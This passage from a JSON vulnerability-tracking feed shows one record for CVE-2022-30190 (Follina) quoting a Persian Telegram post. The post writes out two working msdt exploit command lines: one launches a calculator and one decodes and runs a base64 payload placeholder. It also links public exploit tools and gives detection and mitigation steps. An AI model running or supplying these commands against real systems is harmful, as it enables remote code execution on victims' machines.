"Telegram/bpwD1lFGrjpZJE8nZPfkQ7he0n0Dc1Zua8DNoZEQncgtG5Y", "content": "", "creation_timestamp": "2026-05-08T15:00:06.000000Z"}, {"uuid": "1a55f39d-7646-4079-bd5c-dcc797a6ff7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/referencebooks0/82", "content": "\u2b55\ufe0f \u062f\u0631 initial access \u06a9\u0647 \u062c\u0632\u06cc\u06cc \u0627\u0632 \u067e\u0631\u0648\u0633\u0647 Red Teaming \u0648 \u062f\u0631 \u062d\u0645\u0644\u0627\u062a Client access \u0647\u0633\u062a\u060c \u0645\u0627 \u062a\u06a9\u0646\u06cc\u06a9 \u0647\u0627\u06cc \u0645\u062a\u0641\u0627\u0648\u062a\u06cc \u0645\u06cc\u062a\u0648\u0627\u0646\u06cc\u0645 \u0627\u062c\u0631\u0627 \u06a9\u0646\u06cc\u0645 \u0627\u0639\u0645 \u0627\u0632 macro \u0647\u0627 \u062f\u0631 \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631 \u0647\u0627\u06cc \u06af\u0631\u0648\u0647 \u0622\u0641\u06cc\u0633 \u0648...\n\u062d\u0627\u0644\u0627 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc RCE \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u0645\u06cc\u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u062f\u0631 \u0648\u06cc\u0698\u06af\u06cc \u0634\u0628\u06cc\u0647 macro \u0628\u0647 \u0627\u0633\u0645 remote template \u06a9\u0647 \u0628\u0627 \u067e\u0631\u0648\u062a\u06a9\u0644\u06cc \u0628\u0647 \u0627\u0633\u0645 MSDT \u0627\u06cc\u0646 \u0627\u062a\u0641\u0627\u0642 \u0635\u0648\u0631\u062a \u0645\u06cc\u06af\u06cc\u0631\u0647 \u06a9\u0647 \u0628\u0627\u06cc\u062f \u06af\u0641\u062a \u0628\u0631 \u0631\u0648\u06cc word\u0648 teams \u0648 Excel \u0648 outlook \u0648 Foxit PDF \u0635\u0648\u0631\u062a \u0645\u06cc\u06af\u06cc\u0631\u0647 \u0646\u0627\u06af\u0641\u062a\u0647 \u0646\u0645\u0648\u0646\u0647 \u06a9\u0647 \u0628\u0647 \u062a\u0646\u0647\u0627\u06cc\u06cc \u0647\u0645 \u0645\u06cc\u062a\u0648\u0627\u0646 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0648 \u0627\u062c\u0631\u0627\u06cc \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0647\u0645 \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0628\u0647\u0631\u0647 \u0628\u0628\u0631\u06cc\u0645 \u06a9\u0647 \u062f\u0631 \u0648\u0627\u0642\u0639 \u0645\u0627 \u0645\u06cc\u062a\u0648\u0646\u06cc\u0645 \u0628\u0647 \u0635\u0648\u0631\u062a \u0631\u06cc\u0645\u0648\u062a \u06cc\u06a9 \u0641\u0627\u06cc\u0644 html \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u06cc\u0645 , \u0686\u0648\u0646 \u0631\u0628\u0637\u06cc \u0628\u0647 \u0645\u0627\u06a9\u0631\u0648 \u0647\u0627 \u0646\u062f\u0627\u0631\u0647 \u0645\u0627 \u0645\u0627\u06a9\u0631\u0648 \u0631\u0648 \u0647\u0645 \u063a\u06cc\u0631 \u0641\u0639\u0627\u0644 \u06a9\u0646\u06cc\u0645 \u0627\u0632\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9 \u0645\u06cc\u062a\u0648\u0627\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f.\n\u062d\u0627\u0644\u0627 \u0646\u06a9\u062a\u0647 \u0627\u06cc \u06a9\u0647 \u0647\u0633\u062a\n\u0628\u0627 \u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062e\u0637 \u06a9\u0627\u0645\u0646\u062f:\n\nmsdt /id PCWDiagnostic /skip force /param \\\"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\\\"\n\n\u0645\u0627\u0634\u06cc\u0646 \u062d\u0633\u0627\u0628 \u0627\u062c\u0631\u0627 \u0645\u06cc\u0634\u0647 \n\u0648 \u0628\u0627 \u0627\u062c\u0631\u0627\u06cc : \n\nmsdt:/id PCWDiagnostic /skip force /param \\\\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\\\\"\n\u0627\u06af\u0631 \u062c\u0627\u06cc base64_payload \u067e\u06cc\u0644\u0648\u062f \u0645\u0627 \u0628\u0627\u0634\u0647\u00a0 \u0627\u062c\u0631\u0627 \u0645\u06cc\u0634\u0647 .\n\n\u0628\u0631\u0627\u06cc \u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u0645\u0648\u0631\u062f \u0645\u06cc\u062a\u0648\u0627\u0646 \u0627\u0632 \u0631\u0648\u0634\u0647\u0627\u06cc \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f :\u200c\nhttps://github.com/Hrishikesh7665/Follina_Exploiter_CLI\nhttps://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina\nhttps://github.com/JohnHammond/msdt-follina\n\u0627\u0632 \u0627\u06cc\u0646 \u0627\u0628\u0632\u0627\u0631 \u0647\u0627 \u0645\u06cc\u062a\u0648\u0627\u0646 \u0628\u0647 \u0631\u0627\u062d\u062a\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f.\nhttps://github.com/rayorole/CVE-2022-30190\n\u0627\u06cc\u0646 \u0647\u0645 \u0641\u0627\u06cc\u0644 HTML \u0645\u0648\u0631\u062f \u0646\u0638\u0631 \u0647\u0633\u062a\u0634\n\u0628\u0639\u062f \u0627\u0632 \u062a\u0633\u062a \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0645\u06cc\u0631\u0633\u0647 \u0628\u0647 \u0627\u06cc\u0646\u06a9\u0647 \u0628\u0627\u06cc\u062f \u0686\u06a9\u0627\u0631 \u06a9\u0631\u062f\u061f\n\u0627\u0648\u0644 \u0628\u0631\u0627\u06cc \u062a\u0633\u062a \u06a9\u0631\u062f\u0646 \u0627\u06cc\u0646\u06a9\u0647 \u0622\u06cc\u0627 \u0641\u0627\u06cc\u0644\u06cc \u0622\u0644\u0648\u062f\u0647 \u0647\u0633\u062a \u06cc\u0627 \u062e\u06cc\u0631 , \u062f\u0648 \u0631\u0627\u0647 \u0647\u0633\u062a\n\u0631\u0627\u0647 \u0627\u0648\u0644 \u0627\u06cc\u0646\u0647 \u06a9\u0647 \u0641\u0627\u06cc\u0644 \u062f\u0631\u06cc\u0627\u0641\u062a\u06cc \u0631\u0627 \u0628\u0647 zip \u062a\u0628\u062f\u06cc\u0644 \u06a9\u0646\u06cc\u0645 \u0648\u00a0 \\word_rels\\Document.xml.rels \u0631\u0648 \u0628\u0631\u0631\u0633\u06cc \u06a9\u0646\u06cc\u0645, \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646\u06a9\u0627\u0631 \u0627\u0628\u0632\u0627\u0631\u06cc \u0628\u0631\u0627\u06cc \u062a\u0633\u062a \u0641\u0627\u06cc\u0644 \u0647\u0627 \u062f\u0631 \u0627\u06cc\u0646 \u0644\u06cc\u0646\u06a9 \u0647\u0633\u062a. \n\u062f\u0631 \u0627\u062f\u0627\u0645\u0647 \u0628\u0631\u0627\u06cc \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0645 \u062f\u0631 \u0631\u062c\u06cc\u0633\u062a\u0631\u06cc \u0645\u0633\u06cc\u0631 HKEY_CLASSES_ROOT\\ms-msdt \u0631\u0627 \u062d\u0630\u0641 \u0645\u06cc\u06a9\u0646\u06cc\u0645.\n\u0646\u06a9\u062a\u0647 \u062f\u06cc\u06af\u0647 \u0627\u06cc \u06a9\u0647 \u0647\u0633\u062a \u062d\u0627\u0644\u0627 \u0645\u0627 \u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0627\u06cc\u0646\u06a9\u0647 \u0627\u06cc\u0627 \u0627\u062c\u0631\u0627 \u0634\u062f\u0647 \u0627\u06cc\u0646 \u0627\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645\u0645\u0648\u0646 \u06cc\u0627 \u062e\u06cc\u0631 \u0686\u0647 \u0628\u0627\u06cc\u062f \u06a9\u0646\u06cc\u0645\u061f\n\u0627\u06af\u0631 \u0628\u0647 \u0635\u0648\u0631\u062a \u06a9\u0627\u0645\u0646\u062f\u06cc \u0635\u0648\u0631\u062a \u06af\u0631\u0641\u062a\u0647 \u0628\u0627\u0634\u0647 \u0628\u0627\u06cc\u062f \n\u062f\u0631 \u067e\u0631\u0648\u0633\u0647 \u0647\u0627 \u0628\u0647 \u062f\u0646\u0628\u0627\u0644 msdt \u0648 sdiaghost \u0648 conhost \u0628\u06af\u0631\u062f\u06cc\u0645\n\u062d\u0627\u0644\u0627 \u0627\u06af\u0631 \u0648\u0631\u062f\u06cc \u0627\u062c\u0631\u0627 \u0634\u0648\u062f , \u067e\u0631\u0648\u0633\u0647 winword \u0648 msiexec \u0648 mshta \u0648 msdt \u0645\u0634\u06a9\u0648\u06a9 \u0645\u06cc\u062a\u0648\u0646\u0647 \u0628\u0627\u0634\u0647. \u0646\u06a9\u062a\u0647 \u0628\u0639\u062f\u06cc \u06a9\u0647 \u0645\u06cc\u062a\u0648\u0646\u0647 \u0627\u0647\u0645\u06cc\u062a \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u0647\n\u0628\u0647 \u0647\u0631 \u0637\u0631\u06cc\u0642\u06cc \u06a9\u0647 \u0645\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u06cc\u0645 \n\u06cc\u06a9 \u0641\u0627\u06cc\u0644 xml \u0627\u06cc\u062c\u0627\u062f \u0645\u06cc\u0634\u0647 \u06a9\u0647 \u0645\u0634\u062e\u0635 \u0645\u06cc\u06a9\u0646\u0647 \u0627\u06cc\u0646 \u0627\u062a\u0641\u0627\u0642 \u0627\u0641\u062a\u0627\u062f\u0647(\u0627\u0644\u0628\u062a\u0647 \u062e\u06cc\u0644\u06cc \u0627\u06cc\u0646 \u0645\u0648\u0631\u062f \u0627\u0647\u0645\u06cc\u062a \u0646\u062f\u0627\u0631\u0647 \u0686\u0648\u0646\u0646 \u0645\u06cc\u062a\u0648\u0646\u0647 \u0647\u06a9\u0631 \u0628\u0639\u062f \u0627\u0632 \u0627\u0642\u062f\u0627\u0645\u0634 \u067e\u0627\u06a9\u0634\u0648\u0646 \u06a9\u0646\u0647 )\n\u062f\u0631 \u0645\u0633\u06cc\u0631 appdata/local/diagnostics \u0647\u0633\u062a\u0634.", "creation_timestamp": "2023-12-05T15:14:53.000000Z"}]}